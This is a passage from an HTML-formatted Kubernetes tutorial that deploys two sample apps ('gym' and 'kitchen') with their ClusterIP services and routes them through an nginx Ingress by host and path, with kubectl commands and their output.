class=&#34;string&#34;&gt;mohamedrafraf/k8s-gym&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;ports:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;containerPort:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;80&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;meta&#34;&gt;---&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Service&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;gym-svc&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;selector:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;gym&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;type:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ClusterIP&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;ports:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;protocol:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;TCP&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;port:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;80&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Create the deployment and service of the gym app&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl apply -f gym-deployment.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;deployment.apps/4n6nk8s-gym created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl apply -f gym-svc.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;service/gym-svc created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;The manifest of the restaurant app and the service:&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Restaurant App Deployment&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;31&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;apps/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Deployment&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;4n6nk8s-kitchen&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;replicas:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;selector:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;matchLabels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kitchen&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;template:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kitchen&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;containers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kitchen-app&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;image:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;mohamedrafraf/k8s-kitchen&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;ports:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;containerPort:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;80&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;meta&#34;&gt;---&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Service&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kitchen-svc&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;selector:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kitchen&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;type:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ClusterIP&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;ports:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;protocol:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;TCP&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;port:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;80&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Create the restaurant deployment and the service:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl apply -f kitchen-deployment.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;deployment.apps/4n6nk8s-kitchen created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl apply -f kitchen-svc.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;service/kitchen-svc created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Check the deployments and the services! :&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl get all&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                                   READY   STATUS    RESTARTS   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pod/4n6nk8s-gym-698f44db99-29dnr       1/1     Running   0          63s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pod/4n6nk8s-kitchen-6b56959b86-n7c9z   1/1     Running   0          46s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                        TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)    AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;service/gym-svc             ClusterIP   10.110.191.206   &amp;lt;none&amp;gt;        80/TCP     53s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;service/kitchen-svc         ClusterIP   10.102.94.94     &amp;lt;none&amp;gt;        80/TCP     39s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;service/kubernetes          ClusterIP   10.96.0.1        &amp;lt;none&amp;gt;        443/TCP    3d14h&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                              READY   UP-TO-DATE   AVAILABLE   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;deployment.apps/4n6nk8s-gym       1/1     1            1           63s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;deployment.apps/4n6nk8s-kitchen   1/1     1            1           46s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                                         DESIRED   CURRENT   READY   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;replicaset.apps/4n6nk8s-gym-698f44db99       1         1         1       63s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;replicaset.apps/4n6nk8s-kitchen-6b56959b86   1         1         1       46s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s now create the ingress manifest:&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Ingress YAML Definition&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;networking.k8s.io/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Ingress&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;annotations:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;nginx.ingress.kubernetes.io/rewrite-target:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;/&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ingress-4n6nk8s&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;ingressClassName:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;nginx&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;rules:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;host:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;justk8s.k8s&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;http:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;paths:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;path:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;/kitchen&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;pathType:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Prefix&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;backend:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;attr&#34;&gt;service:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kitchen-svc&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;port:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;number:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;80&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;path:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;/gym&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;pathType:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Prefix&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;backend:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;attr&#34;&gt;service:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;gym-svc&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;port:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;number:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;80&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;The  &lt;code&gt;ingressClassName&lt;/code&gt;  must be “nginx” since we have nginx ingress controller. The  &lt;code&gt;host&lt;/code&gt;  field in the  &lt;code&gt;rules&lt;/code&gt;  define the domain name of the request. So if a HTTP request come to the cluster with the host name  &lt;code&gt;justk8s.k8s&lt;/code&gt;  this rull will be applied!&lt;br&gt;
The the  &lt;code&gt;path&lt;/code&gt;  int the  &lt;code&gt;paths&lt;/code&gt;  will be the route ! The ingress give you the service in this route!&lt;br&gt;
In our Example if we enter  &lt;code&gt;http://justk8s.k8s/kitchen&lt;/code&gt;  the ingress will forward the restaurant app!&lt;br&gt;
in the  &lt;code&gt;path&lt;/code&gt;  field we specify the  &lt;code&gt;service&lt;/code&gt;  name and the  &lt;code&gt;port number&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Now Let’s Create the ingress object&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl apply -f ingress.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;ingress.networking.k8s.io/ingress-4n6nk8s created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Check the ingerss object !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl get ingress&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME              CLASS   HOSTS         ADDRESS   PORTS   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;ingress-4n6nk8s   nginx   justk8s.k8s             80      5s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Display more details about the ingress object with  &lt;code&gt;kubectl describe ingress&lt;/code&gt; :&lt;/p&gt;
